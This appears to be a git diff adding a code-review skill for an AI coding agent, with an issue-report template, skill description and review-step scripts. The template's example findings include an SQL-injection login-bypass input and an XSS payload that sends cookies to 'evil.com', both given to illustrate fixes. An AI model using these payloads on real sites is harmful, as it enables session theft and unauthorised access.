|
||||
"owasp": "A{number}:2021 - {category}",
|
||||
"recommendation": {
|
||||
"description": "{how-to-fix}",
|
||||
"fix_example": "{corrected-code}"
|
||||
},
|
||||
"references": [
|
||||
"https://...",
|
||||
"https://..."
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
## Markdown Template
|
||||
|
||||
```markdown
|
||||
### 🔴 [SEC-{number}] {Vulnerability Title}
|
||||
|
||||
**File**: `{file-path}:{line}`
|
||||
**CWE**: CWE-{number} | **OWASP**: A{number}:2021 - {category}
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`{language}
|
||||
{vulnerable-code-snippet}
|
||||
\`\`\`
|
||||
|
||||
**Issue**: {Detailed explanation of the vulnerability and potential impact}
|
||||
|
||||
**Attack Example** (if applicable):
|
||||
\`\`\`
|
||||
{example-attack-payload}
|
||||
Result: {what-happens}
|
||||
Effect: {security-impact}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`{language}
|
||||
{corrected-code-with-comments}
|
||||
\`\`\`
|
||||
|
||||
**References**:
|
||||
- [{reference-title}]({url})
|
||||
- [{reference-title}]({url})
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Severity Icon Mapping
|
||||
|
||||
- Critical: 🔴
|
||||
- High: 🟠
|
||||
- Medium: 🟡
|
||||
- Low: 🟢
|
||||
|
||||
## Example: SQL Injection Finding
|
||||
|
||||
```markdown
|
||||
### 🔴 [SEC-001] SQL Injection in User Authentication
|
||||
|
||||
**File**: `src/auth/user-service.ts:145`
|
||||
**CWE**: CWE-89 | **OWASP**: A03:2021 - Injection
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`typescript
|
||||
const query = \`SELECT * FROM users WHERE username = '\${username}'\`;
|
||||
const user = await db.execute(query);
|
||||
\`\`\`
|
||||
|
||||
**Issue**: User input (`username`) is directly concatenated into SQL query, allowing attackers to inject malicious SQL commands and bypass authentication.
|
||||
|
||||
**Attack Example**:
|
||||
\`\`\`
|
||||
username: ' OR '1'='1' --
|
||||
Result: SELECT * FROM users WHERE username = '' OR '1'='1' --'
|
||||
Effect: Bypasses authentication, returns all users
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Use parameterized queries
|
||||
const query = 'SELECT * FROM users WHERE username = ?';
|
||||
const user = await db.execute(query, [username]);
|
||||
|
||||
// Or use ORM
|
||||
const user = await User.findOne({ where: { username } });
|
||||
\`\`\`
|
||||
|
||||
**References**:
|
||||
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
|
||||
- [CWE-89](https://cwe.mitre.org/data/definitions/89.html)
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: XSS Finding
|
||||
|
||||
```markdown
|
||||
### 🟠 [SEC-002] Cross-Site Scripting (XSS) in Comment Rendering
|
||||
|
||||
**File**: `src/components/CommentList.tsx:89`
|
||||
**CWE**: CWE-79 | **OWASP**: A03:2021 - Injection
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`tsx
|
||||
<div dangerouslySetInnerHTML={{ __html: comment.body }} />
|
||||
\`\`\`
|
||||
|
||||
**Issue**: User-generated content rendered without sanitization, allowing script injection.
|
||||
|
||||
**Attack Example**:
|
||||
\`\`\`
|
||||
comment.body: "<script>fetch('evil.com/steal?cookie='+document.cookie)</script>"
|
||||
Effect: Steals user session cookies
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`tsx
|
||||
import DOMPurify from 'dompurify';
|
||||
|
||||
// Sanitize HTML before rendering
|
||||
<div dangerouslySetInnerHTML={{
|
||||
__html: DOMPurify.sanitize(comment.body)
|
||||
}} />
|
||||
|
||||
// Or use text content (if HTML not needed)
|
||||
<div>{comment.body}</div>
|
||||
\`\`\`
|
||||
|
||||
**References**:
|
||||
- [OWASP XSS Prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
|
||||
- [CWE-79](https://cwe.mitre.org/data/definitions/79.html)
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Compliance Mapping Template
|
||||
|
||||
When finding affects compliance:
|
||||
|
||||
```markdown
|
||||
**Compliance Impact**:
|
||||
- **PCI DSS**: Requirement 6.5.1 (Injection flaws)
|
||||
- **HIPAA**: Technical Safeguards - Access Control
|
||||
- **GDPR**: Article 32 (Security of processing)
|
||||
```
|
||||
170
.claude/skills/review-code/SKILL.md
Normal file
170
.claude/skills/review-code/SKILL.md
Normal file
@@ -0,0 +1,170 @@
|
||||
---
|
||||
name: review-code
|
||||
description: Multi-dimensional code review with structured reports. Analyzes correctness, readability, performance, security, testing, and architecture. Triggers on "review code", "code review", "审查代码", "代码审查".
|
||||
allowed-tools: Task, AskUserQuestion, Read, Write, Glob, Grep, Bash, mcp__ace-tool__search_context, mcp__ide__getDiagnostics
|
||||
---
|
||||
|
||||
# Review Code
|
||||
|
||||
Multi-dimensional code review skill that analyzes code across 6 key dimensions and generates structured review reports with actionable recommendations.
|
||||
|
||||
## Architecture Overview
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ ⚠️ Phase 0: Specification Study (强制前置) │
|
||||
│ → 阅读 specs/review-dimensions.md │
|
||||
│ → 理解审查维度和问题分类标准 │
|
||||
└───────────────┬─────────────────────────────────────────────────┘
|
||||
↓
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Orchestrator (状态驱动决策) │
|
||||
│ → 读取状态 → 选择审查动作 → 执行 → 更新状态 │
|
||||
└───────────────┬─────────────────────────────────────────────────┘
|
||||
│
|
||||
┌───────────┼───────────┬───────────┬───────────┐
|
||||
↓ ↓ ↓ ↓ ↓
|
||||
┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐
|
||||
│ Collect │ │ Quick │ │ Deep │ │ Report │ │Complete │
|
||||
│ Context │ │ Scan │ │ Review │ │ Generate│ │ │
|
||||
└─────────┘ └─────────┘ └─────────┘ └─────────┘ └─────────┘
|
||||
↓ ↓ ↓ ↓
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Review Dimensions │
|
||||
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ │
|
||||
│ │Correctness│ │Readability│ │Performance│ │ Security │ │
|
||||
│ └──────────┘ └──────────┘ └──────────┘ └──────────┘ │
|
||||
│ ┌──────────┐ ┌──────────┐ │
|
||||
│ │ Testing │ │Architecture│ │
|
||||
│ └──────────┘ └──────────┘ │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Key Design Principles
|
||||
|
||||
1. **多维度审查**: 覆盖正确性、可读性、性能、安全性、测试覆盖、架构一致性六大维度
|
||||
2. **分层执行**: 快速扫描识别高风险区域,深入审查聚焦关键问题
|
||||
3. **结构化报告**: 按严重程度分类,提供文件位置和修复建议
|
||||
4. **状态驱动**: 自主模式,根据审查进度动态选择下一步动作
|
||||
|
||||
---
|
||||
|
||||
## ⚠️ Mandatory Prerequisites (强制前置条件)
|
||||
|
||||
> **⛔ 禁止跳过**: 在执行任何审查操作之前,**必须**完整阅读以下文档。
|
||||
|
||||
### 规范文档 (必读)
|
||||
|
||||
| Document | Purpose | Priority |
|
||||
|----------|---------|----------|
|
||||
| [specs/review-dimensions.md](specs/review-dimensions.md) | 审查维度定义和检查点 | **P0 - 最高** |
|
||||
| [specs/issue-classification.md](specs/issue-classification.md) | 问题分类和严重程度标准 | **P0 - 最高** |
|
||||
| [specs/quality-standards.md](specs/quality-standards.md) | 审查质量标准 | P1 |
|
||||
|
||||
### 模板文件 (生成前必读)
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [templates/review-report.md](templates/review-report.md) | 审查报告模板 |
|
||||
| [templates/issue-template.md](templates/issue-template.md) | 问题记录模板 |
|
||||
|
||||
---
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Phase 0: Specification Study (强制前置 - 禁止跳过) │
|
||||
│ → Read: specs/review-dimensions.md │
|
||||
│ → Read: specs/issue-classification.md │
|
||||
│ → 理解审查标准和问题分类 │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: collect-context │
|
||||
│ → 收集目标文件/目录 │
|
||||
│ → 识别技术栈和语言 │
|
||||
│ → Output: state.context (files, language, framework) │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: quick-scan │
|
||||
│ → 快速扫描整体结构 │
|
||||
│ → 识别高风险区域 │
|
||||
│ → Output: state.risk_areas, state.scan_summary │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: deep-review (per dimension) │
|
||||
│ → 逐维度深入审查 │
|
||||
│ → 记录发现的问题 │
|
||||
│ → Output: state.findings[] │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: generate-report │
|
||||
│ → 汇总所有发现 │
|
||||
│ → 生成结构化报告 │
|
||||
│ → Output: review-report.md │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: complete │
|
||||
│ → 保存最终状态 │
|
||||
│ → 输出审查摘要 │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Directory Setup
|
||||
|
||||
```javascript
|
||||
const timestamp = new Date().toISOString().slice(0,19).replace(/[-:T]/g, '');
|
||||
const workDir = `.workflow/.scratchpad/review-code-${timestamp}`;
|
||||
|
||||
Bash(`mkdir -p "${workDir}"`);
|
||||
Bash(`mkdir -p "${workDir}/findings"`);
|
||||
```
|
||||
|
||||
## Output Structure
|
||||
|
||||
```
|
||||
.workflow/.scratchpad/review-code-{timestamp}/
|
||||
├── state.json # 审查状态
|
||||
├── context.json # 目标上下文
|
||||
├── findings/ # 问题发现
|
||||
│ ├── correctness.json
|
||||
│ ├── readability.json
|
||||
│ ├── performance.json
|
||||
│ ├── security.json
|
||||
│ ├── testing.json
|
||||
│ └── architecture.json
|
||||
└── review-report.md # 最终审查报告
|
||||
```
|
||||
|
||||
## Review Dimensions
|
||||
|
||||
| Dimension | Focus Areas | Key Checks |
|
||||
|-----------|-------------|------------|
|
||||
| **Correctness** | 逻辑正确性 | 边界条件、错误处理、null 检查 |
|
||||
| **Readability** | 代码可读性 | 命名规范、函数长度、注释质量 |
|
||||
| **Performance** | 性能效率 | 算法复杂度、I/O 优化、资源使用 |
|
||||
| **Security** | 安全性 | 注入风险、敏感信息、权限控制 |
|
||||
| **Testing** | 测试覆盖 | 测试充分性、边界覆盖、可维护性 |
|
||||
| **Architecture** | 架构一致性 | 设计模式、分层结构、依赖管理 |
|
||||
|
||||
## Issue Severity Levels
|
||||
|
||||
| Level | Prefix | Description | Action Required |
|
||||
|-------|--------|-------------|-----------------|
|
||||
| **Critical** | [C] | 阻塞性问题,必须立即修复 | Must fix before merge |
|
||||
| **High** | [H] | 重要问题,需要修复 | Should fix |
|
||||
| **Medium** | [M] | 建议改进 | Consider fixing |
|
||||
| **Low** | [L] | 可选优化 | Nice to have |
|
||||
| **Info** | [I] | 信息性建议 | For reference |
|
||||
|
||||
## Reference Documents
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [phases/orchestrator.md](phases/orchestrator.md) | 审查编排器 |
|
||||
| [phases/state-schema.md](phases/state-schema.md) | 状态结构定义 |
|
||||
| [phases/actions/action-collect-context.md](phases/actions/action-collect-context.md) | 收集上下文 |
|
||||
| [phases/actions/action-quick-scan.md](phases/actions/action-quick-scan.md) | 快速扫描 |
|
||||
| [phases/actions/action-deep-review.md](phases/actions/action-deep-review.md) | 深入审查 |
|
||||
| [phases/actions/action-generate-report.md](phases/actions/action-generate-report.md) | 生成报告 |
|
||||
| [phases/actions/action-complete.md](phases/actions/action-complete.md) | 完成审查 |
|
||||
| [specs/review-dimensions.md](specs/review-dimensions.md) | 审查维度规范 |
|
||||
| [specs/issue-classification.md](specs/issue-classification.md) | 问题分类标准 |
|
||||
| [specs/quality-standards.md](specs/quality-standards.md) | 质量标准 |
|
||||
| [templates/review-report.md](templates/review-report.md) | 报告模板 |
|
||||
| [templates/issue-template.md](templates/issue-template.md) | 问题模板 |
|
||||
@@ -0,0 +1,139 @@
|
||||
# Action: Collect Context
|
||||
|
||||
收集审查目标的上下文信息。
|
||||
|
||||
## Purpose
|
||||
|
||||
在开始审查前,收集目标代码的基本信息:
|
||||
- 确定审查范围(文件/目录)
|
||||
- 识别编程语言和框架
|
||||
- 统计代码规模
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'pending' || state.context === null
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
async function execute(state, workDir) {
|
||||
// 1. 询问用户审查目标
|
||||
const input = await AskUserQuestion({
|
||||
questions: [{
|
||||
question: "请指定要审查的代码路径:",
|
||||
header: "审查目标",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "当前目录", description: "审查当前工作目录下的所有代码" },
|
||||
{ label: "src/", description: "审查 src/ 目录" },
|
||||
{ label: "手动指定", description: "输入自定义路径" }
|
||||
]
|
||||
}]
|
||||
});
|
||||
|
||||
const targetPath = input["审查目标"] === "手动指定"
|
||||
? input["其他"]
|
||||
: input["审查目标"] === "当前目录" ? "." : "src/";
|
||||
|
||||
// 2. 收集文件列表
|
||||
const files = Glob(`${targetPath}/**/*.{ts,tsx,js,jsx,py,java,go,rs,cpp,c,cs}`);
|
||||
|
||||
// 3. 检测主要语言
|
||||
const languageCounts = {};
|
||||
files.forEach(file => {
|
||||
const ext = file.split('.').pop();
|
||||
const langMap = {
|
||||
'ts': 'TypeScript', 'tsx': 'TypeScript',
|
||||
'js': 'JavaScript', 'jsx': 'JavaScript',
|
||||
'py': 'Python',
|
||||
'java': 'Java',
|
||||
'go': 'Go',
|
||||
'rs': 'Rust',
|
||||
'cpp': 'C++', 'c': 'C',
|
||||
'cs': 'C#'
|
||||
};
|
||||
const lang = langMap[ext] || 'Unknown';
|
||||
languageCounts[lang] = (languageCounts[lang] || 0) + 1;
|
||||
});
|
||||
|
||||
const primaryLanguage = Object.entries(languageCounts)
|
||||
.sort((a, b) => b[1] - a[1])[0]?.[0] || 'Unknown';
|
||||
|
||||
// 4. 统计代码行数
|
||||
let totalLines = 0;
|
||||
for (const file of files.slice(0, 100)) { // 限制前100个文件
|
||||
try {
|
||||
const content = Read(file);
|
||||
totalLines += content.split('\n').length;
|
||||
} catch (e) {}
|
||||
}
|
||||
|
||||
// 5. 检测框架
|
||||
let framework = null;
|
||||
if (files.some(f => f.includes('package.json'))) {
|
||||
const pkg = JSON.parse(Read('package.json'));
|
||||
if (pkg.dependencies?.react) framework = 'React';
|
||||
else if (pkg.dependencies?.vue) framework = 'Vue';
|
||||
else if (pkg.dependencies?.angular) framework = 'Angular';
|
||||
else if (pkg.dependencies?.express) framework = 'Express';
|
||||
else if (pkg.dependencies?.next) framework = 'Next.js';
|
||||
}
|
||||
|
||||
// 6. 构建上下文
|
||||
const context = {
|
||||
target_path: targetPath,
|
||||
files: files.slice(0, 200), // 限制最多200个文件
|
||||
language: primaryLanguage,
|
||||
framework: framework,
|
||||
total_lines: totalLines,
|
||||
file_count: files.length
|
||||
};
|
||||
|
||||
// 7. 保存上下文
|
||||
Write(`${workDir}/context.json`, JSON.stringify(context, null, 2));
|
||||
|
||||
return {
|
||||
stateUpdates: {
|
||||
status: 'running',
|
||||
context: context
|
||||
}
|
||||
};
|
||||
}
|
||||
```
|
||||
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
status: 'running',
|
||||
context: {
|
||||
target_path: targetPath,
|
||||
files: fileList,
|
||||
language: primaryLanguage,
|
||||
framework: detectedFramework,
|
||||
total_lines: totalLines,
|
||||
file_count: fileCount
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `context.json`
|
||||
- **Location**: `${workDir}/context.json`
|
||||
- **Format**: JSON
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 路径不存在 | 提示用户重新输入 |
|
||||
| 无代码文件 | 返回错误,终止审查 |
|
||||
| 读取权限问题 | 跳过该文件,记录警告 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 成功: action-quick-scan
|
||||
- 失败: action-abort
|
||||
115
.claude/skills/review-code/phases/actions/action-complete.md
Normal file
115
.claude/skills/review-code/phases/actions/action-complete.md
Normal file
@@ -0,0 +1,115 @@
|
||||
# Action: Complete
|
||||
|
||||
完成审查,保存最终状态。
|
||||
|
||||
## Purpose
|
||||
|
||||
结束代码审查流程:
|
||||
- 保存最终状态
|
||||
- 输出审查摘要
|
||||
- 提供报告路径
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'running'
|
||||
- [ ] state.report_generated === true
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
async function execute(state, workDir) {
|
||||
// 1. 计算审查时长
|
||||
const duration = Date.now() - new Date(state.started_at).getTime();
|
||||
const durationMinutes = Math.round(duration / 60000);
|
||||
|
||||
// 2. 生成最终摘要
|
||||
const summary = {
|
||||
...state.summary,
|
||||
review_duration_ms: duration,
|
||||
completed_at: new Date().toISOString()
|
||||
};
|
||||
|
||||
// 3. 保存最终状态
|
||||
const finalState = {
|
||||
...state,
|
||||
status: 'completed',
|
||||
completed_at: summary.completed_at,
|
||||
summary: summary
|
||||
};
|
||||
|
||||
Write(`${workDir}/state.json`, JSON.stringify(finalState, null, 2));
|
||||
|
||||
// 4. 输出摘要信息
|
||||
console.log('========================================');
|
||||
console.log(' CODE REVIEW COMPLETED');
|
||||
console.log('========================================');
|
||||
console.log('');
|
||||
console.log(`📁 审查目标: ${state.context.target_path}`);
|
||||
console.log(`📄 文件数量: ${state.context.file_count}`);
|
||||
console.log(`📝 代码行数: ${state.context.total_lines}`);
|
||||
console.log('');
|
||||
console.log('--- 问题统计 ---');
|
||||
console.log(`🔴 Critical: ${summary.critical}`);
|
||||
console.log(`🟠 High: ${summary.high}`);
|
||||
console.log(`🟡 Medium: ${summary.medium}`);
|
||||
console.log(`🔵 Low: ${summary.low}`);
|
||||
console.log(`⚪ Info: ${summary.info}`);
|
||||
console.log(`📊 Total: ${summary.total_issues}`);
|
||||
console.log('');
|
||||
console.log(`⏱️ 审查用时: ${durationMinutes} 分钟`);
|
||||
console.log('');
|
||||
console.log(`📋 报告位置: ${state.report_path}`);
|
||||
console.log('========================================');
|
||||
|
||||
// 5. 返回状态更新
|
||||
return {
|
||||
stateUpdates: {
|
||||
status: 'completed',
|
||||
completed_at: summary.completed_at,
|
||||
summary: summary
|
||||
}
|
||||
};
|
||||
}
|
||||
```
|
||||
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
status: 'completed',
|
||||
completed_at: new Date().toISOString(),
|
||||
summary: {
|
||||
total_issues: state.summary.total_issues,
|
||||
critical: state.summary.critical,
|
||||
high: state.summary.high,
|
||||
medium: state.summary.medium,
|
||||
low: state.summary.low,
|
||||
info: state.summary.info,
|
||||
review_duration_ms: duration
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **Console**: 审查完成摘要
|
||||
- **State**: 最终状态保存到 `state.json`
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 状态保存失败 | 输出到控制台 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 无(终止状态)
|
||||
|
||||
## Post-Completion
|
||||
|
||||
用户可以:
|
||||
1. 查看完整报告: `cat ${workDir}/review-report.md`
|
||||
2. 查看问题详情: `cat ${workDir}/findings/*.json`
|
||||
3. 导出报告到其他位置
|
||||
302
.claude/skills/review-code/phases/actions/action-deep-review.md
Normal file
302
.claude/skills/review-code/phases/actions/action-deep-review.md
Normal file
@@ -0,0 +1,302 @@
|
||||
# Action: Deep Review
|
||||
|
||||
深入审查指定维度的代码质量。
|
||||
|
||||
## Purpose
|
||||
|
||||
针对单个维度进行深入审查:
|
||||
- 逐文件检查
|
||||
- 记录发现的问题
|
||||
- 提供具体的修复建议
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'running'
|
||||
- [ ] state.scan_completed === true
|
||||
- [ ] 存在未审查的维度
|
||||
|
||||
## Dimension Focus Areas
|
||||
|
||||
### Correctness (正确性)
|
||||
- 逻辑错误和边界条件
|
||||
- Null/undefined 处理
|
||||
- 错误处理完整性
|
||||
- 类型安全
|
||||
- 资源泄漏
|
||||
|
||||
### Readability (可读性)
|
||||
- 命名规范
|
||||
- 函数长度和复杂度
|
||||
- 代码重复
|
||||
- 注释质量
|
||||
- 代码组织
|
||||
|
||||
### Performance (性能)
|
||||
- 算法复杂度
|
||||
- 不必要的计算
|
||||
- 内存使用
|
||||
- I/O 效率
|
||||
- 缓存策略
|
||||
|
||||
### Security (安全性)
|
||||
- 注入风险 (SQL, XSS, Command)
|
||||
- 认证和授权
|
||||
- 敏感数据处理
|
||||
- 加密使用
|
||||
- 依赖安全
|
||||
|
||||
### Testing (测试)
|
||||
- 测试覆盖率
|
||||
- 边界条件测试
|
||||
- 错误路径测试
|
||||
- 测试可维护性
|
||||
- Mock 使用
|
||||
|
||||
### Architecture (架构)
|
||||
- 分层结构
|
||||
- 依赖方向
|
||||
- 单一职责
|
||||
- 接口设计
|
||||
- 扩展性
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
async function execute(state, workDir, currentDimension) {
|
||||
const context = state.context;
|
||||
const dimension = currentDimension;
|
||||
const findings = [];
|
||||
|
||||
// 从外部 JSON 文件加载规则
|
||||
const rulesConfig = loadRulesConfig(dimension, workDir);
|
||||
const rules = rulesConfig.rules || [];
|
||||
const prefix = rulesConfig.prefix || getDimensionPrefix(dimension);
|
||||
|
||||
// 优先审查高风险区域
|
||||
const filesToReview = state.scan_summary?.risk_areas
|
||||
?.map(r => r.file)
|
||||
?.filter(f => context.files.includes(f)) || context.files;
|
||||
|
||||
const filesToCheck = [...new Set([
|
||||
...filesToReview.slice(0, 20),
|
||||
...context.files.slice(0, 30)
|
||||
])].slice(0, 50); // 最多50个文件
|
||||
|
||||
let findingCounter = 1;
|
||||
|
||||
for (const file of filesToCheck) {
|
||||
try {
|
||||
const content = Read(file);
|
||||
const lines = content.split('\n');
|
||||
|
||||
// 应用外部规则文件中的规则
|
||||
for (const rule of rules) {
|
||||
const matches = detectByPattern(content, lines, file, rule);
|
||||
for (const match of matches) {
|
||||
findings.push({
|
||||
id: `${prefix}-${String(findingCounter++).padStart(3, '0')}`,
|
||||
severity: rule.severity || match.severity,
|
||||
dimension: dimension,
|
||||
category: rule.category,
|
||||
file: file,
|
||||
line: match.line,
|
||||
code_snippet: match.snippet,
|
||||
description: rule.description,
|
||||
recommendation: rule.recommendation,
|
||||
fix_example: rule.fixExample
|
||||
});
|
||||
}
|
||||
}
|
||||
} catch (e) {
|
||||
// 跳过无法读取的文件
|
||||
}
|
||||
}
|
||||
|
||||
// 保存维度发现
|
||||
Write(`${workDir}/findings/${dimension}.json`, JSON.stringify(findings, null, 2));
|
||||
|
||||
return {
|
||||
stateUpdates: {
|
||||
reviewed_dimensions: [...(state.reviewed_dimensions || []), dimension],
|
||||
current_dimension: null,
|
||||
[`findings.${dimension}`]: findings
|
||||
}
|
||||
};
|
||||
}
|
||||
|
||||
/**
|
||||
* 从外部 JSON 文件加载规则配置
|
||||
* 规则文件位于 specs/rules/{dimension}-rules.json
|
||||
* @param {string} dimension - 维度名称 (correctness, security, etc.)
|
||||
* @param {string} workDir - 工作目录 (用于日志记录)
|
||||
* @returns {object} 规则配置对象,包含 rules 数组和 prefix
|
||||
*/
|
||||
function loadRulesConfig(dimension, workDir) {
|
||||
// 规则文件路径:相对于 skill 目录
|
||||
const rulesPath = `specs/rules/${dimension}-rules.json`;
|
||||
|
||||
try {
|
||||
const rulesFile = Read(rulesPath);
|
||||
const rulesConfig = JSON.parse(rulesFile);
|
||||
return rulesConfig;
|
||||
} catch (e) {
|
||||
console.warn(`Failed to load rules for ${dimension}: ${e.message}`);
|
||||
// 返回空规则配置,保持向后兼容
|
||||
return { rules: [], prefix: getDimensionPrefix(dimension) };
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* 根据规则的 patternType 检测代码问题
|
||||
* 支持的 patternType: regex, includes
|
||||
* @param {string} content - 文件内容
|
||||
* @param {string[]} lines - 按行分割的内容
|
||||
* @param {string} file - 文件路径
|
||||
* @param {object} rule - 规则配置对象
|
||||
* @returns {Array} 匹配结果数组
|
||||
*/
|
||||
function detectByPattern(content, lines, file, rule) {
|
||||
const matches = [];
|
||||
const { pattern, patternType, negativePatterns, caseInsensitive } = rule;
|
||||
|
||||
if (!pattern) return matches;
|
||||
|
||||
switch (patternType) {
|
||||
case 'regex':
|
||||
return detectByRegex(content, lines, pattern, negativePatterns, caseInsensitive);
|
||||
|
||||
case 'includes':
|
||||
return detectByIncludes(content, lines, pattern, negativePatterns);
|
||||
|
||||
default:
|
||||
// 默认使用 includes 模式
|
||||
return detectByIncludes(content, lines, pattern, negativePatterns);
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* 使用正则表达式检测代码问题
|
||||
* @param {string} content - 文件完整内容
|
||||
* @param {string[]} lines - 按行分割的内容
|
||||
* @param {string} pattern - 正则表达式模式
|
||||
* @param {string[]} negativePatterns - 排除模式列表
|
||||
* @param {boolean} caseInsensitive - 是否忽略大小写
|
||||
* @returns {Array} 匹配结果数组
|
||||
*/
|
||||
function detectByRegex(content, lines, pattern, negativePatterns, caseInsensitive) {
|
||||
const matches = [];
|
||||
const flags = caseInsensitive ? 'gi' : 'g';
|
||||
|
||||
try {
|
||||
const regex = new RegExp(pattern, flags);
|
||||
let match;
|
||||
|
||||
while ((match = regex.exec(content)) !== null) {
|
||||
const lineNum = content.substring(0, match.index).split('\n').length;
|
||||
const lineContent = lines[lineNum - 1] || '';
|
||||
|
||||
// 检查排除模式 - 如果行内容匹配任一排除模式则跳过
|
||||
if (negativePatterns && negativePatterns.length > 0) {
|
||||
const shouldExclude = negativePatterns.some(np => {
|
||||
try {
|
||||
return new RegExp(np).test(lineContent);
|
||||
} catch {
|
||||
return lineContent.includes(np);
|
||||
}
|
||||
});
|
||||
if (shouldExclude) continue;
|
||||
}
|
||||
|
||||
matches.push({
|
||||
line: lineNum,
|
||||
snippet: lineContent.trim().substring(0, 100),
|
||||
matchedText: match[0]
|
||||
});
|
||||
}
|
||||
} catch (e) {
|
||||
console.warn(`Invalid regex pattern: ${pattern}`);
|
||||
}
|
||||
|
||||
return matches;
|
||||
}
|
||||
|
||||
/**
|
||||
* 使用字符串包含检测代码问题
|
||||
* @param {string} content - 文件完整内容 (未使用但保持接口一致)
|
||||
* @param {string[]} lines - 按行分割的内容
|
||||
* @param {string} pattern - 要查找的字符串
|
||||
* @param {string[]} negativePatterns - 排除模式列表
|
||||
* @returns {Array} 匹配结果数组
|
||||
*/
|
||||
function detectByIncludes(content, lines, pattern, negativePatterns) {
|
||||
const matches = [];
|
||||
|
||||
lines.forEach((line, i) => {
|
||||
if (line.includes(pattern)) {
|
||||
// 检查排除模式 - 如果行内容包含任一排除字符串则跳过
|
||||
if (negativePatterns && negativePatterns.length > 0) {
|
||||
const shouldExclude = negativePatterns.some(np => line.includes(np));
|
||||
if (shouldExclude) return;
|
||||
}
|
||||
|
||||
matches.push({
|
||||
line: i + 1,
|
||||
snippet: line.trim().substring(0, 100),
|
||||
matchedText: pattern
|
||||
});
|
||||
}
|
||||
});
|
||||
|
||||
return matches;
|
||||
}
|
||||
|
||||
/**
|
||||
* 获取维度前缀(作为规则文件不存在时的备用)
|
||||
* @param {string} dimension - 维度名称
|
||||
* @returns {string} 4字符前缀
|
||||
*/
|
||||
function getDimensionPrefix(dimension) {
|
||||
const prefixes = {
|
||||
correctness: 'CORR',
|
||||
readability: 'READ',
|
||||
performance: 'PERF',
|
||||
security: 'SEC',
|
||||
testing: 'TEST',
|
||||
architecture: 'ARCH'
|
||||
};
|
||||
return prefixes[dimension] || 'MISC';
|
||||
}
|
||||
```
|
||||
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
reviewed_dimensions: [...state.reviewed_dimensions, currentDimension],
|
||||
current_dimension: null,
|
||||
findings: {
|
||||
...state.findings,
|
||||
[currentDimension]: newFindings
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `findings/{dimension}.json`
|
||||
- **Location**: `${workDir}/findings/`
|
||||
- **Format**: JSON array of Finding objects
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 文件读取失败 | 跳过该文件,记录警告 |
|
||||
| 规则执行错误 | 跳过该规则,继续其他规则 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 还有未审查维度: 继续 action-deep-review
|
||||
- 所有维度完成: action-generate-report
|
||||
@@ -0,0 +1,263 @@
|
||||
# Action: Generate Report
|
||||
|
||||
汇总所有发现,生成结构化审查报告。
|
||||
|
||||
## Purpose
|
||||
|
||||
生成最终的代码审查报告:
|
||||
- 汇总所有维度的发现
|
||||
- 按严重程度排序
|
||||
- 提供统计摘要
|
||||
- 输出 Markdown 格式报告
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'running'
|
||||
